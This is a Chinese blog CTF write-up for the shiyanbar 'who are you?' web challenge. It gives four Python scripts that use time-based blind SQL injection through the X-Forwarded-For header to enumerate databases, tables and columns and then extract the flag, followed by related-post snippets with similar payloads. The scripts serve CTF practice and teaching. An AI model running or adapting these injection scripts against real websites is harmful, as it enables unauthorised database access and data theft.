who are you?-实验吧

最新推荐文章于 2022-11-19 00:58:55 发布
最新推荐文章于 2022-11-19 00:58:55 发布
阅读量1.6k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaorouji/article/details/80465683
本文通过实战案例介绍如何利用时间盲注技术在CTF竞赛中获取目标数据库信息,包括数据库名、表名及列名等关键数据,并最终提取flag。

who are you?

这道题点开看见your ip is :xxx.xxx.xx.xxx

然后试了巨久改ip,改了一堆了还是撤都没有

然后看了大佬的wp的说是时间盲注,试了一下,确实有延迟,然后就用脚本进行时间盲注了

爆数据库

#-*-coding:utf-8-*-
#暴力数据库
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database = []

print('start.')
for database_number in range(0,100):  #爆破前100个库
    database_name =''
    for i in range(1,100):  #字符串长度最多为100
        flag = 0
        for str in guess:  #爆破该位置的字符
            headers = {
                "X-Forwarded-For":"'+"+"(select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)
            }
            try:
                res = requests.get(url,headers=headers,timeout=4)
            except:
                database_name+=str
                flag = 1
                print('scaning no.%d database.'%(database_number+1),database_name)
                break
        if flag==0:
            break
    database.append(database_name)
    if i==1 and flag==0:
        print('finished.')
        break

for i in range(len(database)):
    print(database[i])

然后就能看到有什么数据库了

爆数据表

这里前面是爆了43个数据库,然后我们猜测是在最后一个数据库

贴波脚本

#-*- coding:utf-8-*-
#暴力数据表
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables = []

print('start')
for table_number in range(41,43):
    tablename = ""
    for i in range(1,100):
        flag = 0
        for str in guess:
            headers={
                "X-Forwarded-For":"'+"+"(select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)
            }
            try:
                res = requests.get(url,headers=headers,timeout=4)
            except:
                tablename+=str
                flag=1
                print('scaning no.%d database '%(table_number+1),tablename)
                break
        if flag==0:
            break
    tables.append(tablename)
    if i==1 and flag==0:
        print('finished.')
        break
for i in range(len(tables)):
    print(tables[i])

就可以看见最后一个数据库里面有个flag表

接着爆字项,这个也是前面扫了一下有485个列,也是去扫一下最后一列

# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]

for column_number in range(484,485):            #爆破后面的
    cloumnname=''
    for i in range(1,100):                  #爆破字符串长度不超过100
        flag=0
        for str in guess:                   #爆破该位置的字符
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                cloumnname+=str
                flag=1
                print('scaning the no.%d column '%(column_number+1) ,cloumnname)
                break
        if flag==0:
            break
    columns.append(cloumnname)
    if i==1 and flag==0:
        print('finished.')
        break

for i in range(len(columns)):
    print(columns[i])


可以看到最后一列是有flag的,最后就是暴力出它的值就行了

#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.ascii_lowercase + string.ascii_uppercase + string.digits
flag=""

for i in range(1,100):
    biaoji=0
    for str in guess:
        headers={"X-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
        try:
            res=requests.get(url,headers=headers,timeout=6)
        except(requests.exceptions.ReadTimeout):
            biaoji=1
            flag = flag + str
            print( "flag:", flag)
            break
    if biaoji==0:
        break
print( 'result:' + flag)

这样就出来flag了

这个扫出来是真的慢,等到我从一条咸鱼都发霉变成了霉香咸鱼了...............

HOW POWERFUL ARE GRAPH NEURAL NETWORKS?
weixin_41697507的博客
07-06 3427
HOW POWERFUL ARE GRAPH NEURAL NETWORKS? ABSTRACT Graph Neural Networks (GNNs) are an effective framework for representation learning of graphs. GNNs follow a neighborhood aggregation scheme, where the...
实验-web-wp
Iambangbang的博客
08-21 678
登陆一下好吗? 这道题目是一道技巧性的题目,显然,问题的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道题是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you?
实验who are you? By Assassin 时间盲注
Assassin
01-29 6892
说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:Client-IP x-remote-IP x-originating-IP x-remote-addr 但是这里当然是还是用X-FO
实验who are you
xingyyn78的博客
04-22 375
暴力求数据库名: # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.lowercase+string.uppercase+string.digits+string.punctuation d
实验-who are you?
一个安全研究员
06-28 2864
拿到这一题,根据提示域页面显示的ip,很多小伙伴们肯定猜到了这是一道http头注入,且是与ip相关的,与ip相关的头常见的有: Client-IP x-remote-IP x-originating-IP x-remote-addr x-forwarded-for 最常见的可能就是X-Forwarded-For了吧,所以我直接试了一下,将它的值修改为127.0.0.1,页面上的显示也跟...
实验吧 WEB Who are you?
fr4granc3
02-14 1012
知识点 时间盲注 解题步骤 爆出当前使用的数据库名: #-*-coding:utf-8-*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digi...
CTF实验-WEB专题-1
qq_43679771的博客
11-13 254
CTF实验-WEB专题-1
青华实验学校2016---2017学年小学英语三年级下册期中试卷精选.doc
09-26
这份资料是青华实验学校2016-2017学年度小学英语三年级下学期的期中考试精选试卷,主要考察学生的英语听力和笔试能力。试卷分为听力和笔试两大部分,每部分各占50分。 听力部分: 1. 这一环节要求学生根据录音选择...
实验CTF-web
code_lab
02-27 6502
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
whoareyou.exe
08-19
用于获取抢夺焦点的程序
who are you-实验吧1
Gunther的博客
09-03 3180
who are you 参考了各处blog:发现只有这个链接可以求出flag 在看看求不出来的链接的内容: 简书 作者:Ovie #-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess='abcdefghijklmn
实验CTF-Who are you
ncafei的博客
03-13 5601
原文地址   http://www.jianshu.com/p/5d34b3722128 Who are you http://www.shiyanbar.com/ctf/1941 题目: 我要把攻击我的人都记录db中去! 格式ctf{} 解题: 访问链接,页面显示your IP is XX.XX.XX.XX,知道这是一个关于IP伪造。 尝试
实验吧WP(web部分)【登录一下好吗,who are you, 因缺思汀的绕过,简单的sql注入之3】【不想更新实验吧了,服务器太差】
taozijun的博客
06-13 561
六. 登录一下好吗?通过这道题提示下寄几:不是所有有关sql语句的注入都要报库名表名字段名!!!首先打开这道题,是俩输入框,输入1和1有回显,输入union等字符会不显示,想着应该是回显注入此时应自动脑补sql语句:select * from user where username = ' ' and password = ' '(后经验证是这一个)                        ...
CTF整理】Who are you (2017强网杯web题)
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
04-20 1851
CTF整理】Who are you (2017强网杯web题) 别人思路总结: 0x01 初探 打开网页就是一句“Sorry. You have no permissions.” 按照惯例看看网页源码,发现没有提示; 0x02 初步思考 既然没有提示,也没有其他的链接,那么可能有以下几种可能: 1、敏感文件泄漏 2、跳转 3、cookie / session 第一个想法在经过扫描器扫描之后就放弃...
CTF实验-who are you?【基于sleep盲注脚本】
Sp4rkW的博客
07-21 5756
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先打开链接看到显示your ip is : xxx 首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系 实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧...
一种定位程序失去焦点的办法,元凶竟然是tx电脑管家!
11-19 2674
程序失去焦点可以用whoareyou.exe来定位,但是如果定位到的程序又是别被的程序运行的话,就不是那么好定位了。。。本文提供了一种解决此问题的方案
关于解决伪装成svchost.exe的病毒的清除(界面不断失去焦点,不断播放单击音效)
BXdaze的博客
08-15 5061
刚装完win7系统,在下载必要应用软件的时候,不知道哪里混进来了病毒程序,导致了主屏幕不断失去焦点,窗口不断切回,打开任何的应用程序,几秒后就会切回到主屏幕。之后卡成狗的悲惨状况,使用360等杀毒软件均没有检测出有病毒,没办法只能自己排查了。 我的问题是病毒伪装成svchost.exe,怎么发现的呢? 我首先使用了whoareyou.exe,是一个大神写的能打印当前获得焦点的窗口的应用程序的路
记录实验CTFwho are you? 过程
weixin_33873846的博客
11-29 456
首先我承认我看了别人怎么做的 因为我并没有什么经验虽然知道回显是由X-Forwarded-For参数导致的 但一直无法利用 所以看了demo因为涉及到要写脚本记录注入过程 所以特此记录我看了2个demo选择了最直接的一个也就是使用awvs扫描 然后再python扫 因为我觉得我并没有手工找注入点的本事 先学学利用工具虽然别人写了用awvs 但是开始不管怎么扫描都是扫描不出来...
Who Is Hosting? - 揭示网站托管者的CRX插件
标题:"Who Is Hosting?-crx插件" 描述了此扩展插件的用途,即通过点击浏览器中的按钮快速查找任何网站的托管信息。以下是对该描述所涉及知识点的详细介绍: 1. 扩展插件功能:扩展插件是安装在浏览器上的小程序,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值